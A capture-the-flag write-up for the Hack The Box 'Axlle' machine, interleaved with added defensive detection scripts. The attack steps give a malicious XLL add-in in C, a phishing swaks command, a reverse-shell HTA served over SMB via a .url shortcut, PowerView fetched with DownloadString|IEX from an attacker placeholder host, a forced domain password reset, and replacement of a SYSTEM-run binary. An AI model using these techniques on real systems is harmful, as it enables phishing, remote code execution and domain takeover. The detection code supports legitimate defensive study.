0x1 Initial Access
- Based on XLL-EXEC (external link); modify the exploit so that `xlAutoOpen` runs the desired command:

```c
#include <windows.h>

// Excel calls xlAutoOpen automatically when an add-in is loaded, so the
// command runs as soon as the .xll attachment is opened.
__declspec(dllexport) void __cdecl xlAutoOpen(void);

void __cdecl xlAutoOpen() {
    // Placeholder for the command string (the original uses the
    // "PowerShell #3" one-liner from revshells.com).
    WinExec("PowerShell#3 from revshells.com", 1);
}

// Standard DLL entry point; nothing needs to happen here.
BOOL APIENTRY DllMain(HMODULE hModule,
                      DWORD ul_reason_for_call,
                      LPVOID lpReserved) {
    switch (ul_reason_for_call) {
    case DLL_PROCESS_ATTACH:
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
```

Cross-compile it as a shared library with the `.xll` extension:

```sh
x86_64-w64-mingw32-gcc -fPIC -shared -o shell.xll exploit.c -luser32
```

- Send the exploit via email:

```sh
swaks --to accounts@axlle.htb --from root@test.htb --body "Shell" --header "Subject: Help me Breach the System" --attach shell.xll
```
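From the defending side, the attachment above is a plain PE image whose only Excel-specific trait is the exported `xlAutoOpen` entry point. The following mail-gateway triage check is an added example (not part of the writeup or of XLL-EXEC): it flags attachments that are PE images and either carry the `.xll` extension or contain an Excel auto-load export name, so a renamed add-in is still caught. The sample attachments are constructed stand-ins, not real files.

```python
"""Triage e-mail attachments for Excel add-in (XLL) characteristics.

Added example, not from the original writeup. Uses only the standard
library; the sample attachments below are constructed byte strings.
"""
from dataclasses import dataclass, field

# Export names Excel looks up and calls when an add-in is loaded/unloaded.
XLL_AUTO_EXPORTS = (b"xlAutoOpen", b"xlAutoClose", b"xlAutoAdd", b"xlAutoRemove")


@dataclass
class Verdict:
    filename: str
    is_pe: bool
    xll_extension: bool
    auto_exports: list = field(default_factory=list)

    @property
    def block(self) -> bool:
        # Block any PE image that looks like an Excel add-in, whether or not
        # the sender named it .xll.
        return self.is_pe and (self.xll_extension or bool(self.auto_exports))


def triage_attachment(filename: str, data: bytes) -> Verdict:
    """Inspect one attachment; cheap string checks, no full PE parsing."""
    is_pe = data[:2] == b"MZ"
    xll_ext = filename.lower().endswith(".xll")
    found = [name.decode() for name in XLL_AUTO_EXPORTS if name in data]
    return Verdict(filename, is_pe, xll_ext, found)


def build_sample_xll() -> bytes:
    # Constructed stand-in for a compiled add-in: a DOS magic, padding, and the
    # export name string an add-in would expose. Not a valid executable.
    return b"MZ" + b"\x00" * 62 + b"xlAutoOpen\x00DllMain\x00"


# Constructed sample mailbox: the add-in, the same add-in renamed, and a
# harmless OOXML workbook (zip magic, not a PE).
SAMPLES = {
    "shell.xll": build_sample_xll(),
    "shell.bin": build_sample_xll(),
    "report.xlsx": b"PK\x03\x04" + b"\x00" * 16,
}

if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        v = triage_attachment(name, blob)
        print(f"{name}: block={v.block} exports={v.auto_exports}")
```

A real gateway would additionally walk the PE export directory rather than rely on a string match, but the string check alone already distinguishes the two add-ins from the workbook.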
0x2 User Privilege
- Email from the Web Dev Team (the reason shortcuts placed in C:\inetpub\testing get opened):

  Hi everyone,
  The Web Dev group is doing some development to figure out the best way to automate the checking and addition of URLs into the OSINT portal.
  We ask that you drop any web shortcuts you have into the C:\inetpub\testing folder so we can test the automation.
  Yours in click-worthy URLs,
  The Web Dev Team
- Create an HTA file (`shell.hta`) with a PowerShell reverse shell command embedded:

```html
<html>
<head>
<HTA:APPLICATION ID="shell">
<script language="javascript">
// Placeholder: the PowerShell reverse shell command goes here.
var c = "Reverse Shell Commands";
// Run the command with a hidden window (style 0) and wait for it to return.
new ActiveXObject('WScript.Shell').Run(c, 0, true);
</script>
</head>
<body>
<!-- Close the HTA window so nothing stays visible -->
<script>self.close();</script>
</body>
</html>
```
- Serve the HTA file on an SMB server:

```sh
impacket-smbserver -smb2support share .
```
- Create a shortcut file pointing to the HTA file. Contents of `shell.url`:

```ini
[InternetShortcut]
URL=file://YOUR_IP/share/shell.hta
```

  Written into the test folder from the existing shell with PowerShell:

```powershell
$url = "file://YOUR_IP/share/shell.hta"
$shortcutPath = "C:\inetpub\testing\shell.url"
# CRLF line ending so the file matches the usual .url format
$shortcutContent = "[InternetShortcut]`r`nURL=$url"
Set-Content -Path $shortcutPath -Value $shortcutContent
```
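The shortcut works because the `.url` file points at a remote SMB share and the target is an `.hta`, which `mshta.exe` executes. As an added example (not part of the writeup), the scanner below parses `[InternetShortcut]` files dropped into a folder like `C:\inetpub\testing` and rates each one: a `file://host/...` or `\\host\...` target is a remote share, and a script-capable extension on top of that is rated high. The extension list and the sample shortcut contents are constructed for the example.

```python
"""Scan Internet Shortcut (.url) files for targets on remote file shares.

Added example, not part of the original writeup. The shortcut contents
below are constructed; the extension list is an assumption.
"""
import os
from urllib.parse import urlparse

# Extensions that Windows hands to a script host or loader when opened.
SCRIPT_EXTENSIONS = {".hta", ".js", ".jse", ".vbs", ".vbe", ".wsf",
                     ".ps1", ".bat", ".cmd", ".exe", ".scr", ".lnk", ".dll"}


def parse_internet_shortcut(text: str) -> dict:
    """Return the key=value pairs of the [InternetShortcut] section, keys lower-cased."""
    section, values = None, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].lower()
            continue
        if section == "internetshortcut" and "=" in line:
            key, _, value = line.partition("=")
            values[key.strip().lower()] = value.strip()
    return values


def assess_shortcut(text: str) -> dict:
    """Classify where a shortcut points and how risky opening it is."""
    target = parse_internet_shortcut(text).get("url", "")
    parsed = urlparse(target)
    # file://HOST/share/... and \\HOST\share\... both resolve over SMB to
    # another machine; file:///C:/... is a local path.
    remote_share = (parsed.scheme == "file" and parsed.netloc != "") or target.startswith("\\\\")
    path = parsed.path if parsed.scheme else target
    ext = os.path.splitext(path.replace("\\", "/"))[1].lower()
    scripty = ext in SCRIPT_EXTENSIONS
    if remote_share and scripty:
        severity = "high"      # remote-hosted script runs on the user's machine
    elif remote_share or scripty:
        severity = "medium"
    else:
        severity = "low"
    return {"target": target, "remote_share": remote_share,
            "extension": ext, "severity": severity}


# Constructed sample folder: the first entry mirrors the shape of the shortcut
# in the writeup; the UNC host 10.10.14.5 is made up for the example.
SAMPLE_SHORTCUTS = {
    "shell.url": "[InternetShortcut]\r\nURL=file://YOUR_IP/share/shell.hta\r\n",
    "intranet.url": "[InternetShortcut]\r\nURL=https://intranet.example.local/portal\r\n",
    "notes.url": "[InternetShortcut]\r\nURL=file:///C:/Users/Public/notes.txt\r\n",
    "tool.url": "[InternetShortcut]\r\nURL=\\\\10.10.14.5\\share\\update.vbs\r\n",
}


def scan_folder(shortcuts: dict) -> list:
    """Return (name, severity) for every shortcut rated above 'low'."""
    findings = []
    for name, content in shortcuts.items():
        result = assess_shortcut(content)
        if result["severity"] != "low":
            findings.append((name, result["severity"]))
    return findings


if __name__ == "__main__":
    for name, sev in scan_folder(SAMPLE_SHORTCUTS):
        print(f"{name}: {sev}")
```

Feeding the function real files is a matter of reading each `*.url` in the folder; the parser tolerates CRLF endings and comment lines, which is how Windows writes these files.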
- Get a shell as `dallon.matrix`:

```powershell
PS C:\> whoami
axlle\dallon.matrix
```

- Get `user.txt`.
- Use BloodHound to analyze Active Directory permissions and relationships.
- Use the PowerView module to change the password of another domain user (e.g., Jacob.Greeny), using the current user's right to force a password change on that account:

```powershell
# Load PowerView into memory
(New-Object System.Net.WebClient).DownloadString('http://YOUR_IP/PowerView.ps1') | IEX
```

- Set a new password for Jacob.Greeny:

```powershell
$pass = ConvertTo-SecureString 'SuperSecuredPassword123!' -AsPlainText -Force
Set-DomainUserPassword -Identity Jacob.Greeny -AccountPassword $pass
```

- Gain access as Jacob.Greeny.
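A forced password reset like the one above leaves a Windows Security event 4724 ("an attempt was made to reset an account's password") on the domain controller, with the resetting account in `SubjectUserName` and the victim in `TargetUserName`. The detection below is an added example (not from the writeup): it runs over constructed key=value log lines and reports resets performed by accounts outside an approved set, ignoring machine accounts. The approved-resetter list and the log format are assumptions; real collectors emit XML or JSON, so only the field extraction would change.

```python
"""Flag password resets (Security event 4724) by unapproved accounts.

Added example, not from the original writeup. Log lines are constructed in a
key=value form; adapt parse_event() to your collector's format.
"""
import re

# Accounts permitted to reset other users' passwords (assumption for a given domain).
APPROVED_RESETTERS = {"administrator", "svc_helpdesk"}

KV_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')


def parse_event(line: str) -> dict:
    """Turn 'Key=value Key2="quoted value"' into a dict."""
    return {k: v.strip('"') for k, v in KV_RE.findall(line)}


def find_suspicious_resets(lines) -> list:
    """Return 4724 events whose subject is neither approved nor a machine account."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev.get("EventID") != "4724":
            continue  # 4723 is a user changing their own password; not of interest here
        subject = ev.get("SubjectUserName", "").lower()
        target = ev.get("TargetUserName", "").lower()
        if subject in APPROVED_RESETTERS or subject.endswith("$"):
            continue
        hits.append({"time": ev.get("Time"), "subject": subject, "target": target})
    return hits


# Constructed sample log: one approved reset, one self-change, one reset by an
# ordinary user holding a ForceChangePassword right, one by a machine account.
SAMPLE_LOG = [
    'Time=2024-06-01T10:02:11Z EventID=4724 SubjectUserName=administrator TargetUserName=alice.smith',
    'Time=2024-06-01T10:05:43Z EventID=4723 SubjectUserName=bob.jones TargetUserName=bob.jones',
    'Time=2024-06-01T10:07:09Z EventID=4724 SubjectUserName=dallon.matrix TargetUserName=Jacob.Greeny',
    'Time=2024-06-01T10:08:00Z EventID=4724 SubjectUserName=DC01$ TargetUserName=krbtgt',
]

if __name__ == "__main__":
    for hit in find_suspicious_resets(SAMPLE_LOG):
        print(f"{hit['time']}: {hit['subject']} reset password of {hit['target']}")
```

Allow-listing by account name is the simplest form of this rule; in production the approved set is usually derived from group membership, and the same check pairs well with the BloodHound edges (ForceChangePassword) that show who is able to do this in the first place.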
0x3 Shell as Jacob.Greeny
**NOTE: I have automated the running of `C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64\standalonerunner.exe` as SYSTEM to test and debug this driver in a standalone environment**
```text
*Evil-WinRM* PS C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64> icacls standalonerunner.exe
standalonerunner.exe AXLLE\App Devs:(I)(RX,W)
                     Everyone:(I)(R)
                     AXLLE\Administrator:(I)(F)
```
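The root cause in both the intended and the unintended privilege escalation below is the same: a binary that a scheduled task runs as SYSTEM is writable (`W`) by the non-administrative `AXLLE\App Devs` group. The script below is an added example (not part of the writeup) of the check an administrator would run over `icacls` output to catch this: it parses each ACE, ignores deny entries and trusted principals, and reports any remaining principal holding a write-capable right. The trusted-principal set and the assumption that the path contains no spaces (icacls was invoked with a relative name, as on the page) are the example's own; the second sample output is constructed.

```python
"""Parse icacls output and flag executables writable by non-privileged principals.

Added example, not from the original writeup. The first sample reproduces the
permissions shown in the writeup; the second is constructed as a clean case.
"""
import re

# Rights that let a principal replace or alter the file's contents.
WRITE_RIGHTS = {"F", "M", "W", "D", "WD", "AD", "WA", "WEA", "DC"}

# Principals expected to hold write access on SYSTEM-run binaries (assumption).
TRUSTED = {"NT AUTHORITY\\SYSTEM", "BUILTIN\\Administrators",
           "NT SERVICE\\TrustedInstaller"}

# "<principal>:(flag)(flag)...(rights)"  e.g.  AXLLE\App Devs:(I)(RX,W)
ACE_RE = re.compile(r"^(?P<principal>.+?):(?P<groups>(?:\([^)]*\))+)$")


def parse_icacls(output: str) -> list:
    """Return [(path, principal, flags, rights)] for each ACE in icacls output."""
    entries, path = [], None
    for raw in output.splitlines():
        if not raw.strip():
            continue
        if not raw[0].isspace():
            # First line of a file: "<path> <principal>:(...)" (path without spaces).
            candidate, _, rest = raw.partition(" ")
        else:
            candidate, rest = path, raw  # continuation line for the same file
        m = ACE_RE.match(rest.strip())
        if not m:
            continue  # summary lines such as "Successfully processed ..."
        path = candidate
        groups = re.findall(r"\(([^)]*)\)", m.group("groups"))
        flags, rights = groups[:-1], groups[-1].split(",")
        entries.append((path, m.group("principal"), flags, rights))
    return entries


def is_trusted(principal: str) -> bool:
    return principal in TRUSTED or principal.upper().endswith("\\ADMINISTRATOR")


def writable_by_untrusted(output: str) -> list:
    """Return [(path, principal, rights)] where an untrusted principal can write."""
    findings = []
    for path, principal, flags, rights in parse_icacls(output):
        if "DENY" in flags or is_trusted(principal):
            continue
        if WRITE_RIGHTS & set(rights):
            findings.append((path, principal, rights))
    return findings


# Sample 1: the permissions from the writeup (summary line added as icacls prints it).
SAMPLE_OUTPUT = """\
standalonerunner.exe AXLLE\\App Devs:(I)(RX,W)
                     Everyone:(I)(R)
                     AXLLE\\Administrator:(I)(F)
Successfully processed 1 files; Failed processing 0 files
"""

# Sample 2: constructed clean case, only SYSTEM and Administrators can write.
SAMPLE_OK = """\
svc.exe NT AUTHORITY\\SYSTEM:(F)
        BUILTIN\\Administrators:(F)
        BUILTIN\\Users:(RX)
Successfully processed 1 files; Failed processing 0 files
"""

if __name__ == "__main__":
    for finding in writable_by_untrusted(SAMPLE_OUTPUT):
        print("writable by untrusted principal:", finding)
```

Running the check across every binary referenced by scheduled tasks and services is the practical way to find this class of misconfiguration before a low-privileged account does.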
0x4 Root Access (Intended)
- Arbitrary command execution via the Windows Kits StandaloneRunner (external reference).
- Create `reboot.rsf` with the following content:

```text
myTestDir
True
```

- Mimic the directory structure it expects:

```powershell
mkdir myTestDir
mkdir myTestDir\working
```

- Create an empty `rsf.rsf` file inside `myTestDir\working`.
- Create `command.txt` containing the reverse shell command in the same directory as `standalonerunner.exe`.
- Wait for `standalonerunner.exe` to execute (it is run automatically as SYSTEM, per the note above).
- Get a SYSTEM (root) shell and read `root.txt`.
0x5 Unintended Root
- Since the file is writable (see the icacls output above), replace `standalonerunner.exe` with a malicious `.exe` to gain access as Administrator:

```powershell
*Evil-WinRM* PS C:\Program Files (x86)\Windows Kits\10\Testing\StandaloneTesting\Internal\x64> wget http://YOUR_IP/standalonerunner.exe -OutFile standalonerunner.exe
```

- Get a Metasploit session as Administrator.
- Read `root.txt`.